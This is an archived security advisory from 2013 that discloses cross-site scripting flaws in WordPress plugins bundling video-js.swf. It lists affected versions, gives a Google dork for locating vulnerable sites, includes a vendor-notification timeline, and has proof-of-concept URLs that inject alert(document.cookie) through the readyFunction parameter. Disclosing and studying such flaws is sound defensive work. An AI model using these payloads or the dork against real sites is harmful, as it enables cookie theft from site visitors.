what you don't know can hurt you

WordPress Video JS Cross Site Scripting

WordPress Video JS Cross Site Scripting
Posted May 14, 2013
Authored by MustLive

Various WordPress plugins that embed video-js.swf suffer from cross site scripting vulnerabilities. These include Video Embed and Thumbnail Generator, External "Video for Everybody", 1player, S3 Video and EasySqueezePage.

tags | exploit, vulnerability, xss
MD5 | 36d7d8ea51d31b6732ee7681dffeb094

WordPress Video JS Cross Site Scripting

Change Mirror Download
Hello list!

These are Cross-Site Scripting vulnerabilities in multiple plugins for
WordPress with VideoJS. Earlier I've wrote about vulnerabilities in VideoJS
(http://seclists.org/fulldisclosure/2013/May/21). This is popular video and
audio player, which is used at hundreds thousands of web sites and in
multiple web applications. Google dork for VideoJS shows 446000 results and
for WP plugins with it shows 178000 (inurl:video-js.swf
inurl:wp-content/plugins/).

In addition to plugin VideoJS - HTML5 Video Player for WordPress
(http://seclists.org/fulldisclosure/2013/May/35), about which I wrote
earlier, here are new plugins with this player.

Among them are Video Embed & Thumbnail Generator, External "Video for
Everybody", 1player, S3 Video and EasySqueezePage. But there are other
vulnerable plugins for WP with video-js.swf (which can be found with
above-mentioned Google dork). All developers of these plugins, the same as
developers of all other web applications with VideoJS, need to update it in
their software.

-------------------------
Affected products:
-------------------------

Video Embed & Thumbnail Generator 4.0.3 and previous versions.
External "Video for Everybody" 2.0 and previous versions.
1player 1.2 and previous versions.
S3 Video 0.97 and previous versions.
EasySqueezePage (all versions).

Vulnerable are web applications which are using VideoJS Flash Component
3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not
vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be
read in repository on github). Also there are bypass methods which work in
the last version, but the developers haven't fixed them due to their low
impact. So update to last version of VideoJS.swf.

-------------------------
Affected vendors:
-------------------------

Plugins' pages at WordPress plugins catalog:

Video Embed & Thumbnail Generator
http://wordpress.org/extend/plugins/video-embed-thumbnail-generator/
External "Video for Everybody"
http://wordpress.org/extend/plugins/external-video-for-everybody/
1player
http://wordpress.org/extend/plugins/1player/
S3 Video
http://wordpress.org/extend/plugins/s3-video/

----------
Details:
----------

Cross-Site Scripting (WASC-08):

Video Embed & Thumbnail Generator:

http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie)

External "Video for Everybody":

http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie)

1player:

http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie)

S3 Video:

http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie)

EasySqueezePage:

http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie)

------------
Timeline:
------------

2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They
thanked and promised to fix it.
2013.02.23 - reminded VideoJS developers and asked for date of releasing the
fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent previous letter to
Zencoder's developers (since Brightcove, which acquired Zencoder, ignored
the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And
made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in
source code on github.
2013.05.02 - developers compiled fixed version of swf (after my reminding)
and uploaded to both repositories.
2013.05.02 - tested version 3.0.2 and found that developers haven't fixed
the hole completely and informed them.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close